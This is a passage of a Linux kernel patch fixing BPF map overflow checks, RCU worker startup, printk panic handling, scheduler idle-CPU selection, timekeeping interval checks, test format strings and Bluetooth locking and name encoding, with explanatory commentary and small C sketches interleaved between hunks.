+ int io_sqe_files_register(struct io_ring_ctx *ctx, void __user *arg,
+ 			  unsigned nr_args, u64 __user *tags);
+ 
+-int __io_scm_file_account(struct io_ring_ctx *ctx, struct file *file);
+-
+-static inline bool io_file_need_scm(struct file *filp)
+-{
+-	return false;
+-}
+-
+-static inline int io_scm_file_account(struct io_ring_ctx *ctx,
+-				      struct file *file)
+-{
+-	if (likely(!io_file_need_scm(file)))
+-		return 0;
+-	return __io_scm_file_account(ctx, file);
+-}
+-
+ int io_register_files_update(struct io_ring_ctx *ctx, void __user *arg,
+ 			     unsigned nr_args);
+ int io_register_rsrc_update(struct io_ring_ctx *ctx, void __user *arg,
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 76bf1de261152..44abf88e1bb0d 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -857,7 +857,12 @@ static LIST_HEAD(pack_list);
+  * CONFIG_MMU=n. Use PAGE_SIZE in these cases.
+  */
+ #ifdef PMD_SIZE
+-#define BPF_PROG_PACK_SIZE (PMD_SIZE * num_possible_nodes())
++/* PMD_SIZE is really big for some archs. It doesn't make sense to
++ * reserve too much memory in one allocation. Hardcode BPF_PROG_PACK_SIZE to
++ * 2MiB * num_possible_nodes(). On most architectures PMD_SIZE will be
++ * greater than or equal to 2MB.
++ */
++#define BPF_PROG_PACK_SIZE (SZ_2M * num_possible_nodes())
+ #else
+ #define BPF_PROG_PACK_SIZE PAGE_SIZE
+ #endif
+diff --git a/kernel/bpf/cpumap.c b/kernel/bpf/cpumap.c
+index 0508937048137..806a7c1b364b6 100644
+--- a/kernel/bpf/cpumap.c
++++ b/kernel/bpf/cpumap.c
+@@ -306,6 +306,7 @@ static int cpu_map_bpf_prog_run(struct bpf_cpu_map_entry *rcpu, void **frames,
+ static int cpu_map_kthread_run(void *data)
+ {
+ 	struct bpf_cpu_map_entry *rcpu = data;
++	unsigned long last_qs = jiffies;
+ 
+ 	complete(&rcpu->kthread_running);
+ 	set_current_state(TASK_INTERRUPTIBLE);
+@@ -331,10 +332,12 @@ static int cpu_map_kthread_run(void *data)
+ 			if (__ptr_ring_empty(rcpu->queue)) {
+ 				schedule();
+ 				sched = 1;
++				last_qs = jiffies;
+ 			} else {
+ 				__set_current_state(TASK_RUNNING);
+ 			}
+ 		} else {
++			rcu_softirq_qs_periodic(last_qs);
+ 			sched = cond_resched();
+ 		}
+ 
+diff --git a/kernel/bpf/devmap.c b/kernel/bpf/devmap.c
+index f9a87dcc5535b..e051cbb07dac0 100644
+--- a/kernel/bpf/devmap.c
++++ b/kernel/bpf/devmap.c
+@@ -131,13 +131,14 @@ static int dev_map_init_map(struct bpf_dtab *dtab, union bpf_attr *attr)
+ 	bpf_map_init_from_attr(&dtab->map, attr);
+ 
+ 	if (attr->map_type == BPF_MAP_TYPE_DEVMAP_HASH) {
+-		dtab->n_buckets = roundup_pow_of_two(dtab->map.max_entries);
+-
+-		if (!dtab->n_buckets) /* Overflow check */
++		/* hash table size must be power of 2; roundup_pow_of_two() can
++		 * overflow into UB on 32-bit arches, so check that first
++		 */
++		if (dtab->map.max_entries > 1UL << 31)
+ 			return -EINVAL;
+-	}
+ 
+-	if (attr->map_type == BPF_MAP_TYPE_DEVMAP_HASH) {
++		dtab->n_buckets = roundup_pow_of_two(dtab->map.max_entries);
++
+ 		dtab->dev_index_head = dev_map_create_hash(dtab->n_buckets,
+ 							   dtab->map.numa_node);
+ 		if (!dtab->dev_index_head)
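
The same fix appears three times in this patch (devmap here, hashtab and stackmap below): on 32-bit arches, roundup_pow_of_two(n) for n > 2^31 ends up shifting 1UL by 32 bits, which is undefined behaviour, so the size is now bounds-checked before rounding instead of checking the rounded result for zero afterwards. The pattern in isolation:

	#include <linux/errno.h>
	#include <linux/log2.h>
	#include <linux/types.h>

	static int nbuckets_for(u32 max_entries, u32 *n_buckets)
	{
		/* would shift 1UL by 32 inside roundup_pow_of_two(): UB */
		if (max_entries > 1UL << 31)
			return -E2BIG;
		*n_buckets = roundup_pow_of_two(max_entries);
		return 0;
	}
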
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index 88c71de0a0a95..0c74cc9012d5c 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -495,7 +495,13 @@ static struct bpf_map *htab_map_alloc(union bpf_attr *attr)
+ 							  num_possible_cpus());
+ 	}
+ 
+-	/* hash table size must be power of 2 */
++	/* hash table size must be power of 2; roundup_pow_of_two() can overflow
++	 * into UB on 32-bit arches, so check that first
++	 */
++	err = -E2BIG;
++	if (htab->map.max_entries > 1UL << 31)
++		goto free_htab;
++
+ 	htab->n_buckets = roundup_pow_of_two(htab->map.max_entries);
+ 
+ 	htab->elem_size = sizeof(struct htab_elem) +
+@@ -505,10 +511,8 @@ static struct bpf_map *htab_map_alloc(union bpf_attr *attr)
+ 	else
+ 		htab->elem_size += round_up(htab->map.value_size, 8);
+ 
+-	err = -E2BIG;
+-	/* prevent zero size kmalloc and check for u32 overflow */
+-	if (htab->n_buckets == 0 ||
+-	    htab->n_buckets > U32_MAX / sizeof(struct bucket))
++	/* check for u32 overflow */
++	if (htab->n_buckets > U32_MAX / sizeof(struct bucket))
+ 		goto free_htab;
+ 
+ 	err = -ENOMEM;
+diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
+index 83f8f67e933df..758510b46d87b 100644
+--- a/kernel/bpf/helpers.c
++++ b/kernel/bpf/helpers.c
+@@ -328,7 +328,7 @@ static inline void __bpf_spin_lock_irqsave(struct bpf_spin_lock *lock)
+ 	__this_cpu_write(irqsave_flags, flags);
+ }
+ 
+-notrace BPF_CALL_1(bpf_spin_lock, struct bpf_spin_lock *, lock)
++NOTRACE_BPF_CALL_1(bpf_spin_lock, struct bpf_spin_lock *, lock)
+ {
+ 	__bpf_spin_lock_irqsave(lock);
+ 	return 0;
+@@ -350,7 +350,7 @@ static inline void __bpf_spin_unlock_irqrestore(struct bpf_spin_lock *lock)
+ 	local_irq_restore(flags);
+ }
+ 
+-notrace BPF_CALL_1(bpf_spin_unlock, struct bpf_spin_lock *, lock)
++NOTRACE_BPF_CALL_1(bpf_spin_unlock, struct bpf_spin_lock *, lock)
+ {
+ 	__bpf_spin_unlock_irqrestore(lock);
+ 	return 0;
+diff --git a/kernel/bpf/stackmap.c b/kernel/bpf/stackmap.c
+index f86db3cf72123..f0fd936cef319 100644
+--- a/kernel/bpf/stackmap.c
++++ b/kernel/bpf/stackmap.c
+@@ -94,11 +94,14 @@ static struct bpf_map *stack_map_alloc(union bpf_attr *attr)
+ 	} else if (value_size / 8 > sysctl_perf_event_max_stack)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	/* hash table size must be power of 2 */
+-	n_buckets = roundup_pow_of_two(attr->max_entries);
+-	if (!n_buckets)
++	/* hash table size must be power of 2; roundup_pow_of_two() can overflow
++	 * into UB on 32-bit arches, so check that first
++	 */
++	if (attr->max_entries > 1UL << 31)
+ 		return ERR_PTR(-E2BIG);
+ 
++	n_buckets = roundup_pow_of_two(attr->max_entries);
++
+ 	cost = n_buckets * sizeof(struct stack_map_bucket *) + sizeof(*smap);
+ 	smap = bpf_map_area_alloc(cost, bpf_map_attr_numa_node(attr));
+ 	if (!smap)
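
The devmap, hashtab, and stackmap hunks above all close the same hole: on 32-bit arches roundup_pow_of_two(n) expands to 1UL << fls_long(n - 1), so any n above 1UL << 31 produces a shift by BITS_PER_LONG, which is undefined behavior; the old checks inspected the (already undefined) result instead of rejecting the input. A sketch of the corrected ordering, assuming kernel context and using -E2BIG as in the hashtab hunk:

static int size_buckets(u32 max_entries, u32 *n_buckets)
{
	/* Reject before rounding: for max_entries > 1UL << 31 the
	 * roundup_pow_of_two() shift count reaches BITS_PER_LONG on
	 * 32-bit, which is UB, so its result cannot be tested safely.
	 */
	if (max_entries > 1UL << 31)
		return -E2BIG;

	*n_buckets = roundup_pow_of_two(max_entries);
	return 0;
}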
+diff --git a/kernel/module/main.c b/kernel/module/main.c
+index 7a376e26de85b..554aba47ab689 100644
+--- a/kernel/module/main.c
++++ b/kernel/module/main.c
+@@ -2434,6 +2434,11 @@ static void do_free_init(struct work_struct *w)
+ 	}
+ }
+ 
++void flush_module_init_free_work(void)
++{
++	flush_work(&init_free_wq);
++}
++
+ #undef MODULE_PARAM_PREFIX
+ #define MODULE_PARAM_PREFIX "module."
+ /* Default value for module->async_probe_requested */
+@@ -2524,8 +2529,8 @@ static noinline int do_init_module(struct module *mod)
+ 	 * Note that module_alloc() on most architectures creates W+X page
+ 	 * mappings which won't be cleaned up until do_free_init() runs.  Any
+ 	 * code such as mark_rodata_ro() which depends on those mappings to
+-	 * be cleaned up needs to sync with the queued work - ie
+-	 * rcu_barrier()
++	 * be cleaned up needs to sync with the queued work by invoking
++	 * flush_module_init_free_work().
+ 	 */
+ 	if (llist_add(&freeinit->node, &init_free_list))
+ 		schedule_work(&init_free_wq);
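
flush_module_init_free_work() gives mark_rodata_ro() and friends a direct way to wait for the deferred do_free_init() work instead of the rcu_barrier() the old comment pointed at; it is simply flush_work() on the shared work item. A hedged sketch of a hypothetical caller, assuming the declaration is made visible elsewhere in this series:

void tighten_permissions_example(void)
{
	/* module_alloc() may leave W+X mappings that only do_free_init()
	 * tears down; wait for any queued instance before assuming the
	 * mappings are gone.
	 */
	flush_module_init_free_work();

	/* ... now safe to mark kernel text/rodata read-only ... */
}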
+diff --git a/kernel/printk/printk.c b/kernel/printk/printk.c
+index cc53fb77f77cc..981cdb00b8722 100644
+--- a/kernel/printk/printk.c
++++ b/kernel/printk/printk.c
+@@ -1797,10 +1797,23 @@ static bool console_waiter;
+  */
+ static void console_lock_spinning_enable(void)
+ {
++	/*
++	 * Do not use spinning in panic(). The panic CPU wants to keep the lock.
++	 * Non-panic CPUs abandon the flush anyway.
++	 *
++	 * Just keep the lockdep annotation. The panic-CPU should avoid
++	 * taking console_owner_lock because it might cause a deadlock.
++	 * This looks like the easiest way to prevent false lockdep
++	 * reports without handling the races in a lockless way.
++	 */
++	if (panic_in_progress())
++		goto lockdep;
++
+ 	raw_spin_lock(&console_owner_lock);
+ 	console_owner = current;
+ 	raw_spin_unlock(&console_owner_lock);
+ 
++lockdep:
+ 	/* The waiter may spin on us after setting console_owner */
+ 	spin_acquire(&console_owner_dep_map, 0, 0, _THIS_IP_);
+ }
+@@ -1824,6 +1837,22 @@ static int console_lock_spinning_disable_and_check(void)
+ {
+ 	int waiter;
+ 
++	/*
++	 * Ignore spinning waiters during panic() because they might get stopped
++	 * or blocked at any time,
++	 * or blocked at any time.
++	 *
++	 * It is safe because nobody is allowed to start spinning during panic
++	 * in the first place. If there has been a waiter then non-panic CPUs
++	 * will never start spinning and an interrupted spin on panic CPU will
++	 * never continue.
++	 */
++	if (panic_in_progress()) {
++		/* Keep lockdep happy. */
++		spin_release(&console_owner_dep_map, _THIS_IP_);
++		return 0;
++	}
++
+ 	raw_spin_lock(&console_owner_lock);
+ 	waiter = READ_ONCE(console_waiter);
+ 	console_owner = NULL;
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 9d7464a90f85d..61f9503a5fe9c 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -4465,13 +4465,16 @@ static void __init rcu_start_exp_gp_kworkers(void)
+ 	rcu_exp_gp_kworker = kthread_create_worker(0, gp_kworker_name);
+ 	if (IS_ERR_OR_NULL(rcu_exp_gp_kworker)) {
+ 		pr_err("Failed to create %s!\n", gp_kworker_name);
++		rcu_exp_gp_kworker = NULL;
+ 		return;
+ 	}
+ 
+ 	rcu_exp_par_gp_kworker = kthread_create_worker(0, par_gp_kworker_name);
+ 	if (IS_ERR_OR_NULL(rcu_exp_par_gp_kworker)) {
+ 		pr_err("Failed to create %s!\n", par_gp_kworker_name);
++		rcu_exp_par_gp_kworker = NULL;
+ 		kthread_destroy_worker(rcu_exp_gp_kworker);
++		rcu_exp_gp_kworker = NULL;
+ 		return;
+ 	}
+ 
+diff --git a/kernel/rcu/tree_exp.h b/kernel/rcu/tree_exp.h
+index 6d2cbed96b462..75e8d9652f7bb 100644
+--- a/kernel/rcu/tree_exp.h
++++ b/kernel/rcu/tree_exp.h
+@@ -427,7 +427,12 @@ static void sync_rcu_exp_select_node_cpus(struct kthread_work *wp)
+ 	__sync_rcu_exp_select_node_cpus(rewp);
+ }
+ 
+-static inline bool rcu_gp_par_worker_started(void)
++static inline bool rcu_exp_worker_started(void)
++{
++	return !!READ_ONCE(rcu_exp_gp_kworker);
++}
++
++static inline bool rcu_exp_par_worker_started(void)
+ {
+ 	return !!READ_ONCE(rcu_exp_par_gp_kworker);
+ }
+@@ -477,7 +482,12 @@ static void sync_rcu_exp_select_node_cpus(struct work_struct *wp)
+ 	__sync_rcu_exp_select_node_cpus(rewp);
+ }
+ 
+-static inline bool rcu_gp_par_worker_started(void)
++static inline bool rcu_exp_worker_started(void)
++{
++	return !!READ_ONCE(rcu_gp_wq);
++}
++
++static inline bool rcu_exp_par_worker_started(void)
+ {
+ 	return !!READ_ONCE(rcu_par_gp_wq);
+ }
+@@ -540,7 +550,7 @@ static void sync_rcu_exp_select_cpus(void)
+ 		rnp->exp_need_flush = false;
+ 		if (!READ_ONCE(rnp->expmask))
+ 			continue; /* Avoid early boot non-existent wq. */
+-		if (!rcu_gp_par_worker_started() ||
++		if (!rcu_exp_par_worker_started() ||
+ 		    rcu_scheduler_active != RCU_SCHEDULER_RUNNING ||
+ 		    rcu_is_last_leaf_node(rnp)) {
+ 			/* No worker started yet or last leaf, do direct call. */
+@@ -910,7 +920,7 @@ static int rcu_print_task_exp_stall(struct rcu_node *rnp)
+  */
+ void synchronize_rcu_expedited(void)
+ {
+-	bool boottime = (rcu_scheduler_active == RCU_SCHEDULER_INIT);
++	bool use_worker;
+ 	unsigned long flags;
+ 	struct rcu_exp_work rew;
+ 	struct rcu_node *rnp;
+@@ -921,6 +931,9 @@ void synchronize_rcu_expedited(void)
+ 			 lock_is_held(&rcu_sched_lock_map),
+ 			 "Illegal synchronize_rcu_expedited() in RCU read-side critical section");
+ 
++	use_worker = (rcu_scheduler_active != RCU_SCHEDULER_INIT) &&
++		      rcu_exp_worker_started();
++
+ 	/* Is the state is such that the call is a grace period? */
+ 	if (rcu_blocking_is_gp()) {
+ 		// Note well that this code runs with !PREEMPT && !SMP.
+@@ -950,7 +963,7 @@ void synchronize_rcu_expedited(void)
+ 		return;  /* Someone else did our work for us. */
+ 
+ 	/* Ensure that load happens before action based on it. */
+-	if (unlikely(boottime)) {
++	if (unlikely(!use_worker)) {
+ 		/* Direct call during scheduler init and early_initcalls(). */
+ 		rcu_exp_sel_wait_wake(s);
+ 	} else {
+@@ -968,7 +981,7 @@ void synchronize_rcu_expedited(void)
+ 	/* Let the next expedited grace period start. */
+ 	mutex_unlock(&rcu_state.exp_mutex);
+ 
+-	if (likely(!boottime))
++	if (likely(use_worker))
+ 		synchronize_rcu_expedited_destroy_work(&rew);
+ }
+ EXPORT_SYMBOL_GPL(synchronize_rcu_expedited);
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 2558ab9033bee..91c101ecfef9f 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -6656,7 +6656,7 @@ static int select_idle_core(struct task_struct *p, int core, struct cpumask *cpu
+ 		if (!available_idle_cpu(cpu)) {
+ 			idle = false;
+ 			if (*idle_cpu == -1) {
+-				if (sched_idle_cpu(cpu) && cpumask_test_cpu(cpu, p->cpus_ptr)) {
++				if (sched_idle_cpu(cpu) && cpumask_test_cpu(cpu, cpus)) {
+ 					*idle_cpu = cpu;
+ 					break;
+ 				}
+@@ -6664,7 +6664,7 @@ static int select_idle_core(struct task_struct *p, int core, struct cpumask *cpu
+ 			}
+ 			break;
+ 		}
+-		if (*idle_cpu == -1 && cpumask_test_cpu(cpu, p->cpus_ptr))
++		if (*idle_cpu == -1 && cpumask_test_cpu(cpu, cpus))
+ 			*idle_cpu = cpu;
+ 	}
+ 
+@@ -6678,13 +6678,19 @@ static int select_idle_core(struct task_struct *p, int core, struct cpumask *cpu
+ /*
+  * Scan the local SMT mask for idle CPUs.
+  */
+-static int select_idle_smt(struct task_struct *p, int target)
++static int select_idle_smt(struct task_struct *p, struct sched_domain *sd, int target)
+ {
+ 	int cpu;
+ 
+ 	for_each_cpu_and(cpu, cpu_smt_mask(target), p->cpus_ptr) {
+ 		if (cpu == target)
+ 			continue;
++		/*
++		 * Check if the CPU is in the LLC scheduling domain of @target.
++		 * Due to isolcpus, there is no guarantee that all the siblings are in the domain.
++		 */
++		if (!cpumask_test_cpu(cpu, sched_domain_span(sd)))
++			continue;
+ 		if (available_idle_cpu(cpu) || sched_idle_cpu(cpu))
+ 			return cpu;
+ 	}
+@@ -6708,7 +6714,7 @@ static inline int select_idle_core(struct task_struct *p, int core, struct cpuma
+ 	return __select_idle_cpu(core, p);
+ }
+ 
+-static inline int select_idle_smt(struct task_struct *p, int target)
++static inline int select_idle_smt(struct task_struct *p, struct sched_domain *sd, int target)
+ {
+ 	return -1;
+ }
+@@ -6970,7 +6976,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 		has_idle_core = test_idle_cores(target);
+ 
+ 		if (!has_idle_core && cpus_share_cache(prev, target)) {
+-			i = select_idle_smt(p, prev);
++			i = select_idle_smt(p, sd, prev);
+ 			if ((unsigned int)i < nr_cpumask_bits)
+ 				return i;
+ 		}
+diff --git a/kernel/time/time_test.c b/kernel/time/time_test.c
+index 831e8e779acef..f7c3de01197c9 100644
+--- a/kernel/time/time_test.c
++++ b/kernel/time/time_test.c
+@@ -73,7 +73,7 @@ static void time64_to_tm_test_date_range(struct kunit *test)
+ 
+ 		days = div_s64(secs, 86400);
+ 
+-		#define FAIL_MSG "%05ld/%02d/%02d (%2d) : %ld", \
++		#define FAIL_MSG "%05ld/%02d/%02d (%2d) : %lld", \
+ 			year, month, mdday, yday, days
+ 
+ 		KUNIT_ASSERT_EQ_MSG(test, year - 1900, result.tm_year, FAIL_MSG);
+diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
+index 221c8c404973a..b158cbef4d8dc 100644
+--- a/kernel/time/timekeeping.c
++++ b/kernel/time/timekeeping.c
+@@ -1180,13 +1180,15 @@ static int adjust_historical_crosststamp(struct system_time_snapshot *history,
+ }
+ 
+ /*
+- * cycle_between - true if test occurs chronologically between before and after
++ * timestamp_in_interval - true if ts is chronologically in [start, end]
++ *
++ * True if ts occurs chronologically at or after start, and before or at end.
+  */
+-static bool cycle_between(u64 before, u64 test, u64 after)
++static bool timestamp_in_interval(u64 start, u64 end, u64 ts)
+ {
+-	if (test > before && test < after)
++	if (ts >= start && ts <= end)
+ 		return true;
+-	if (test < before && before > after)
++	if (start > end && (ts >= start || ts <= end))
+ 		return true;
+ 	return false;
+ }
+@@ -1246,7 +1248,7 @@ int get_device_system_crosststamp(int (*get_time_fn)
+ 		 */
+ 		now = tk_clock_read(&tk->tkr_mono);
+ 		interval_start = tk->tkr_mono.cycle_last;
+-		if (!cycle_between(interval_start, cycles, now)) {
++		if (!timestamp_in_interval(interval_start, now, cycles)) {
+ 			clock_was_set_seq = tk->clock_was_set_seq;
+ 			cs_was_changed_seq = tk->cs_was_changed_seq;
+ 			cycles = interval_start;
+@@ -1259,10 +1261,8 @@ int get_device_system_crosststamp(int (*get_time_fn)
+ 				      tk_core.timekeeper.offs_real);
+ 		base_raw = tk->tkr_raw.base;
+ 
+-		nsec_real = timekeeping_cycles_to_ns(&tk->tkr_mono,
+-						     system_counterval.cycles);
+-		nsec_raw = timekeeping_cycles_to_ns(&tk->tkr_raw,
+-						    system_counterval.cycles);
++		nsec_real = timekeeping_cycles_to_ns(&tk->tkr_mono, cycles);
++		nsec_raw = timekeeping_cycles_to_ns(&tk->tkr_raw, cycles);
+ 	} while (read_seqcount_retry(&tk_core.seq, seq));
+ 
+ 	xtstamp->sys_realtime = ktime_add_ns(base_real, nsec_real);
+@@ -1277,13 +1277,13 @@ int get_device_system_crosststamp(int (*get_time_fn)
+ 		bool discontinuity;
+ 
+ 		/*
+-		 * Check that the counter value occurs after the provided
++		 * Check that the counter value is not before the provided
+ 		 * history reference and that the history doesn't cross a
+ 		 * clocksource change
+ 		 */
+ 		if (!history_begin ||
+-		    !cycle_between(history_begin->cycles,
+-				   system_counterval.cycles, cycles) ||
++		    !timestamp_in_interval(history_begin->cycles,
++					   cycles, system_counterval.cycles) ||
+ 		    history_begin->cs_was_changed_seq != cs_was_changed_seq)
+ 			return -EINVAL;
+ 		partial_history_cycles = cycles - system_counterval.cycles;
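
The renamed helper makes both endpoints inclusive and copes with a wrapping cycle counter: when start > end the interval spans the wrap point, so ts lies inside iff ts >= start or ts <= end. A standalone check with a worked wrap case (plain-C mirror of the helper, not kernel code):

#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

typedef uint64_t u64;

/* Same logic as the kernel helper above. */
static bool timestamp_in_interval(u64 start, u64 end, u64 ts)
{
	if (ts >= start && ts <= end)
		return true;
	if (start > end && (ts >= start || ts <= end))
		return true;	/* interval wraps past the counter maximum */
	return false;
}

int main(void)
{
	/* Non-wrapping interval: endpoints are now included. */
	assert(timestamp_in_interval(100, 200, 100));
	assert(timestamp_in_interval(100, 200, 200));
	/* Wrapping interval [UINT64_MAX - 5, 10]: both sides count. */
	assert(timestamp_in_interval(UINT64_MAX - 5, 10, UINT64_MAX - 1));
	assert(timestamp_in_interval(UINT64_MAX - 5, 10, 3));
	assert(!timestamp_in_interval(UINT64_MAX - 5, 10, 50));
	return 0;
}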
+diff --git a/lib/cmdline_kunit.c b/lib/cmdline_kunit.c
+index d4572dbc91453..705b82736be08 100644
+--- a/lib/cmdline_kunit.c
++++ b/lib/cmdline_kunit.c
+@@ -124,7 +124,7 @@ static void cmdline_do_one_range_test(struct kunit *test, const char *in,
+ 			    n, e[0], r[0]);
+ 
+ 	p = memchr_inv(&r[1], 0, sizeof(r) - sizeof(r[0]));
+-	KUNIT_EXPECT_PTR_EQ_MSG(test, p, NULL, "in test %u at %u out of bound", n, p - r);
++	KUNIT_EXPECT_PTR_EQ_MSG(test, p, NULL, "in test %u at %td out of bound", n, p - r);
+ }
+ 
+ static void cmdline_test_range(struct kunit *test)
+diff --git a/lib/memcpy_kunit.c b/lib/memcpy_kunit.c
+index 2b5cc70ac53fc..dbedd99aa6163 100644
+--- a/lib/memcpy_kunit.c
++++ b/lib/memcpy_kunit.c
+@@ -32,7 +32,7 @@ struct some_bytes {
+ 	BUILD_BUG_ON(sizeof(instance.data) != 32);	\
+ 	for (size_t i = 0; i < sizeof(instance.data); i++) {	\
+ 		KUNIT_ASSERT_EQ_MSG(test, instance.data[i], v, \
+-			"line %d: '%s' not initialized to 0x%02x @ %d (saw 0x%02x)\n", \
++			"line %d: '%s' not initialized to 0x%02x @ %zu (saw 0x%02x)\n", \
+ 			__LINE__, #instance, v, i, instance.data[i]);	\
+ 	}	\
+ } while (0)
+@@ -41,7 +41,7 @@ struct some_bytes {
+ 	BUILD_BUG_ON(sizeof(one) != sizeof(two)); \
+ 	for (size_t i = 0; i < sizeof(one); i++) {	\
+ 		KUNIT_EXPECT_EQ_MSG(test, one.data[i], two.data[i], \
+-			"line %d: %s.data[%d] (0x%02x) != %s.data[%d] (0x%02x)\n", \
++			"line %d: %s.data[%zu] (0x%02x) != %s.data[%zu] (0x%02x)\n", \
+ 			__LINE__, #one, i, one.data[i], #two, i, two.data[i]); \
+ 	}	\
+ 	kunit_info(test, "ok: " TEST_OP "() " name "\n");	\
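
The three KUnit fixes above (time_test, cmdline_kunit, memcpy_kunit) correct printf-style format specifiers rather than logic: div_s64() returns an s64, which needs %lld; a pointer difference is ptrdiff_t, which needs %td; and a size_t loop index needs %zu. A standalone userspace illustration of the corrected pairings:

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

int main(void)
{
	int64_t days = -25202;	/* s64 in kernel terms: print with %lld */
	int r[4] = { 0 };
	int *p = &r[3];
	size_t i = 7;

	printf("days  = %lld\n", (long long)days);
	printf("delta = %td\n", p - r);	/* ptrdiff_t: %td */
	printf("index = %zu\n", i);	/* size_t: %zu */
	return 0;
}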
+diff --git a/lib/test_blackhole_dev.c b/lib/test_blackhole_dev.c
+index 4c40580a99a36..f247089d63c08 100644
+--- a/lib/test_blackhole_dev.c
++++ b/lib/test_blackhole_dev.c
+@@ -29,7 +29,6 @@ static int __init test_blackholedev_init(void)
+ {
+ 	struct ipv6hdr *ip6h;
+ 	struct sk_buff *skb;
+-	struct ethhdr *ethh;
+ 	struct udphdr *uh;
+ 	int data_len;
+ 	int ret;
+@@ -61,7 +60,7 @@ static int __init test_blackholedev_init(void)
+ 	ip6h->saddr = in6addr_loopback;
+ 	ip6h->daddr = in6addr_loopback;
+ 	/* Ether */
+-	ethh = (struct ethhdr *)skb_push(skb, sizeof(struct ethhdr));
++	skb_push(skb, sizeof(struct ethhdr));
+ 	skb_set_mac_header(skb, 0);
+ 
+ 	skb->protocol = htons(ETH_P_IPV6);
+diff --git a/net/bluetooth/af_bluetooth.c b/net/bluetooth/af_bluetooth.c
+index f1b7510359e4b..3f9ff02baafe3 100644
+--- a/net/bluetooth/af_bluetooth.c
++++ b/net/bluetooth/af_bluetooth.c
+@@ -264,14 +264,11 @@ int bt_sock_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 	if (flags & MSG_OOB)
+ 		return -EOPNOTSUPP;
+ 
+-	lock_sock(sk);
+-
+ 	skb = skb_recv_datagram(sk, flags, &err);
+ 	if (!skb) {
+ 		if (sk->sk_shutdown & RCV_SHUTDOWN)
+ 			err = 0;
+ 
+-		release_sock(sk);
+ 		return err;
+ 	}
+ 
+@@ -297,8 +294,6 @@ int bt_sock_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 
+ 	skb_free_datagram(sk, skb);
+ 
+-	release_sock(sk);
+-
+ 	if (flags & MSG_TRUNC)
+ 		copied = skblen;
+ 
+@@ -521,10 +516,11 @@ int bt_sock_ioctl(struct socket *sock, unsigned int cmd, unsigned long arg)
+ 		if (sk->sk_state == BT_LISTEN)
+ 			return -EINVAL;
+ 
+-		lock_sock(sk);
++		spin_lock(&sk->sk_receive_queue.lock);
+ 		skb = skb_peek(&sk->sk_receive_queue);
+ 		amount = skb ? skb->len : 0;
+-		release_sock(sk);
++		spin_unlock(&sk->sk_receive_queue.lock);
++
+ 		err = put_user(amount, (int __user *)arg);
+ 		break;
+ 
+diff --git a/net/bluetooth/eir.c b/net/bluetooth/eir.c
+index 8a85f6cdfbc16..1bc51e2b05a34 100644
+--- a/net/bluetooth/eir.c
++++ b/net/bluetooth/eir.c
+@@ -13,48 +13,33 @@
+ 
+ #define PNP_INFO_SVCLASS_ID		0x1200
+ 
+-static u8 eir_append_name(u8 *eir, u16 eir_len, u8 type, u8 *data, u8 data_len)
+-{
+-	u8 name[HCI_MAX_SHORT_NAME_LENGTH + 1];
+-
+-	/* If data is already NULL terminated just pass it directly */
+-	if (data[data_len - 1] == '\0')
+-		return eir_append_data(eir, eir_len, type, data, data_len);
+-
+-	memcpy(name, data, HCI_MAX_SHORT_NAME_LENGTH);
+-	name[HCI_MAX_SHORT_NAME_LENGTH] = '\0';
+-
+-	return eir_append_data(eir, eir_len, type, name, sizeof(name));
+-}
+-
+ u8 eir_append_local_name(struct hci_dev *hdev, u8 *ptr, u8 ad_len)
+ {
+ 	size_t short_len;
+ 	size_t complete_len;
+ 
+-	/* no space left for name (+ NULL + type + len) */
+-	if ((HCI_MAX_AD_LENGTH - ad_len) < HCI_MAX_SHORT_NAME_LENGTH + 3)
++	/* no space left for name (+ type + len) */
++	if ((max_adv_len(hdev) - ad_len) < HCI_MAX_SHORT_NAME_LENGTH + 2)
+ 		return ad_len;
+ 
+ 	/* use complete name if present and fits */
+ 	complete_len = strnlen(hdev->dev_name, sizeof(hdev->dev_name));
+ 	if (complete_len && complete_len <= HCI_MAX_SHORT_NAME_LENGTH)
+-		return eir_append_name(ptr, ad_len, EIR_NAME_COMPLETE,
+-				       hdev->dev_name, complete_len + 1);
++		return eir_append_data(ptr, ad_len, EIR_NAME_COMPLETE,
++				       hdev->dev_name, complete_len);
+ 
+ 	/* use short name if present */
+ 	short_len = strnlen(hdev->short_name, sizeof(hdev->short_name));
+ 	if (short_len)
+-		return eir_append_name(ptr, ad_len, EIR_NAME_SHORT,
++		return eir_append_data(ptr, ad_len, EIR_NAME_SHORT,
+ 				       hdev->short_name,
+-				       short_len == HCI_MAX_SHORT_NAME_LENGTH ?
+-				       short_len : short_len + 1);
++				       short_len);
+ 
+ 	/* use shortened full name if present, we already know that name
+ 	 * is longer then HCI_MAX_SHORT_NAME_LENGTH
+ 	 */
+ 	if (complete_len)
+-		return eir_append_name(ptr, ad_len, EIR_NAME_SHORT,
++		return eir_append_data(ptr, ad_len, EIR_NAME_SHORT,
+ 				       hdev->dev_name,
+ 				       HCI_MAX_SHORT_NAME_LENGTH);
+ 
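
The eir.c change stops NUL-terminating names and sizes the space check as len + type only (+2, not +3), because an EIR/AD field is a plain TLV whose length byte covers the type byte plus the payload. A sketch of the layout, mirroring what eir_append_data() is expected to emit (not copied from this patch):

/* Append one TLV field; returns the new total EIR length. */
static u8 eir_append_sketch(u8 *eir, u8 eir_len, u8 type,
			    const u8 *data, u8 data_len)
{
	eir[eir_len++] = data_len + 1;	/* length = type byte + payload */
	eir[eir_len++] = type;		/* e.g. EIR_NAME_COMPLETE */
	memcpy(&eir[eir_len], data, data_len);
	return eir_len + data_len;	/* no trailing NUL is emitted */
}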
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
